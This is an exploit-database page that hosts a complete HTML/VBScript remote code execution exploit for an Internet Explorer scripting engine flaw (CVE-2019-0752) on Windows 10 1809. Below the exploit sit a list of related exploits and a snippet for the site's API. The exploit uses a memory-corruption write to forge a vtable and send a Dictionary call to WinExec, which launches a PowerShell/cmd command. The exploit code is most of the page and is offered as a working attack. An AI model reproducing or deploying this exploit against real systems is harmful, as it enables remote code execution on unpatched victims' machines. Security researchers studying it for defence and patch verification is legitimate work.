Menu

"Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption"

Author

"Simon Zuckerbraun"

Platform

windows

Release date

2019-05-24

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
<!-- Full exploit of ZDI-19-359/ZDI-CAN-7757/CVE-2019-0752                                      -->
<!-- Target: Internet Explorer, Windows 10 1809 17763.316 (Feb. 2019 patch level)               -->
<!-- Vulnerability and original exploit technique by Simon Zuckerbraun (@HexKitchen), Mar. 2019 -->

<!-- Tgroupcrew@gmail.com -->

<!-- Demonstrates taking an arbitrary write primitive with no info leak, and using it to get    -->
<!-- all the way to RCE using no shellcode.                                                     -->

<!-- Note use of CVE-2019-0768 to get VBScript to run on IE/Win10.                              -->
<!--    (h/t: James Forshaw, Google Project Zero)                                               -->

<html>
<meta http-equiv="x-ua-compatible" content="IE=8">
<meta http-equiv="Expires" content="-1">
<body>
	<div id="container1" style="overflow:scroll; width: 10px">
		<div id="content1" style="width:5000000px">
			Content
		</div>
	</div>
<script language="VBScript.Encode">
Dim ar1(&h3000000)
Dim ar2(1000)
Dim gremlin
addressOfGremlin = &h28281000
Class MyClass
	Private mValue
	Public Property Let Value(v)
		mValue = v
	End Property
	Public Default Property Get P
		P = mValue				' Where to write
	End Property
End Class
Sub TriggerWrite(where, val)
	Dim v1
	Set v1 = document.getElementById("container1")
	v1.scrollLeft = val		' Write this value (Maximum: 0x001767dd)
	Dim c
	Set c = new MyClass
	c.Value = where
	Set v1.scrollLeft = c
End Sub
' Our vulnerability does not immediately give us an unrestricted
' write (though we could manufacture one). For our purposes, the
' following is sufficient. It writes an arbitrary DWORD to an
' arbitrary location, and sets the subsequent 3 bytes to zero.
Sub WriteInt32With3ByteZeroTrailer(addr, val)
	TriggerWrite addr    , (val) AND &hff
	TriggerWrite addr + 1, (val\&h100) AND &hff
	TriggerWrite addr + 2, (val\&h10000) AND &hff
	TriggerWrite addr + 3, (val\&h1000000) AND &hff
End Sub
Sub WriteAsciiStringWith4ByteZeroTrailer(addr, str)
	For i = 0 To Len(str) - 1
		TriggerWrite addr + i, Asc(Mid(str, i + 1, 1))
	Next
End Sub
Function ReadInt32(addr)
	WriteInt32With3ByteZeroTrailer addressOfGremlin + &h8, addr
	ReadInt32 = ar1(gremlin)
End Function
Function LeakAddressOfObject(obj)
	Set ar1(gremlin + 1) = obj
	LeakAddressOfObject = ReadInt32(addressOfGremlin + &h18)
End Function
Sub Exploit()
	' Corrupt vt of one array element (the "gremlin")
	TriggerWrite addressOfGremlin, &h4003	' VT_BYREF | VT_I4
	For i = ((addressOfGremlin - &h20) / &h10) Mod &h100 To UBound(ar1) Step &h100
		If Not IsEmpty(ar1(i)) Then
			gremlin = i
			Exit For
		End If
	Next
	
	If IsEmpty(gremlin) Then
		MsgBox "Could not find gremlin"
		Exit Sub
	End If
	
	For i = 0 To UBound(ar2)
		Set ar2(i) = CreateObject("Scripting.Dictionary")
	Next
	
	Set dict = ar2(UBound(ar2) / 2)
	addressOfDict = LeakAddressOfObject(dict)
	vtableOfDict = ReadInt32(addressOfDict)
	scrrun = vtableOfDict - &h11fc
	kernel32 = ReadInt32(scrrun + &h1f1a4) - &h23c90
	winExec = kernel32 + &h5d380
	
	dict.Exists "dummy"		' Make a dispatch call, just to populate pld
	' Relocate pld to ensure its address doesn't contain a null byte
	pld = ReadInt32(addressOfDict + &h3c)
	fakePld = &h28281020
	For i = 0 To 3 - 1
		WriteInt32With3ByteZeroTrailer fakePld + 4 * i, ReadInt32(pld + 4 * i)
	Next
	
	fakeVtable = &h28282828		' ASCII "(((("
	For i = 0 To 21
		If i = 12 Then		' Dictionary.Exists
			fptr = winExec
		Else
			fptr = ReadInt32(vtableOfDict + 4 * i)
		End If
		WriteInt32With3ByteZeroTrailer (fakeVtable + 4 * i), fptr
	Next
	
	WriteAsciiStringWith4ByteZeroTrailer addressOfDict, "((((\..\PowerShell.ewe -Command ""<#AAAAAAAAAAAAAAAAAAAAAAAAA"
	WriteInt32With3ByteZeroTrailer addressOfDict + &h3c, fakePld
	WriteAsciiStringWith4ByteZeroTrailer addressOfDict + &h40, "#>$a = """"Start-Process cmd `""""""/t:4f /k whoami /user`"""""""""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"""
	
	On Error Resume Next
	dict.Exists "dummy"		' Wheeee!!
	
	' A little cleanup to help prevent crashes after the exploit
	For i = 1 To 3
		WriteInt32With3ByteZeroTrailer addressOfDict + &h48 * i, vtableOfDict
		WriteInt32With3ByteZeroTrailer addressOfDict + (&h48 * i) + &h14, 2
	Next
	Erase Dict
	Erase ar2
End Sub
Exploit
</script>
</body>
</html>
Release Date Title Type Platform Author
2019-08-15 "Microsoft Windows Text Services Framework MSCTF - Multiple Vulnerabilities" local windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Double Free due to Malformed JP2 Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - free() of Uninitialized Pointer due to Malformed JBIG2Globals Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed JP2 Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Memory Corruption due to Malformed TTF Font" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow in CoolType.dll" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed Font Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Static Buffer Overflow due to Malformed Font Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow While Processing Malformed PDF" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Use-After-Free due to Malformed JP2 Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Out-of-Bounds read due to Malformed JP2 Stream" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap-Based Out-of-Bounds read in FixSbitSubTableFormat1" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap Corruption in MakeFormat12MergedGlyphList" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap-Based Out-of-Bounds read in WriteTableFromStructure" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap Corruption in ReadAllocFormat12CharGlyphMapList" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap Corruption in ReadTableIntoStructure" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap Corruption in FixSbitSubTables" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Double Free in MergeFormat12Cmap / MakeFormat12MergedGlyphList" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap-Based Out-of-Bounds read in GetGlyphIdx" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Returning a Dangling Pointer via MergeFontPackage" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat CoolType (AFDKO) - Call from Uninitialized Memory due to Empty FDArray in Type 1 Fonts" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat CoolType (AFDKO) - Memory Corruption in the Handling of Type 1 Font load/store Operators" dos windows "Google Security Research"
2019-08-14 "ManageEngine opManager 12.3.150 - Authenticated Code Execution" webapps windows kindredsec
2019-08-14 "TortoiseSVN 1.12.1 - Remote Code Execution" webapps windows Vulnerability-Lab
2019-08-14 "Microsoft Windows 10 AppXSvc Deployment Service - Arbitrary File Deletion" local windows "Abdelhamid Naceri"
2019-08-12 "Steam Windows Client - Local Privilege Escalation" local windows AbsoZed
2019-08-14 "Windows PowerShell - Unsanitized Filename Command Execution" dos windows hyp3rlinx
2019-08-05 "Apache Tika 1.15 - 1.17 - Header Command Injection (Metasploit)" remote windows Metasploit
2019-07-26 "Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation" local windows ShivamTrivedi
2019-07-18 "Microsoft Windows 10 1903/1809 - RPCSS Activation Kernel Security Callback Privilege Escalation" local windows "Google Security Research"
Release Date Title Type Platform Author
2019-05-24 "Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption" remote windows "Simon Zuckerbraun"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46928/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46928/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46928/41342/microsoft-internet-explorer-windows-10-1809-17763316-scripting-engine-memory-corruption/download/", "exploit_id": "46928", "exploit_description": "\"Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption\"", "exploit_date": "2019-05-24", "exploit_author": "\"Simon Zuckerbraun\"", "exploit_type": "remote", "exploit_platform": "windows", "exploit_port": null}
                                            

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Browse exploit APIBrowse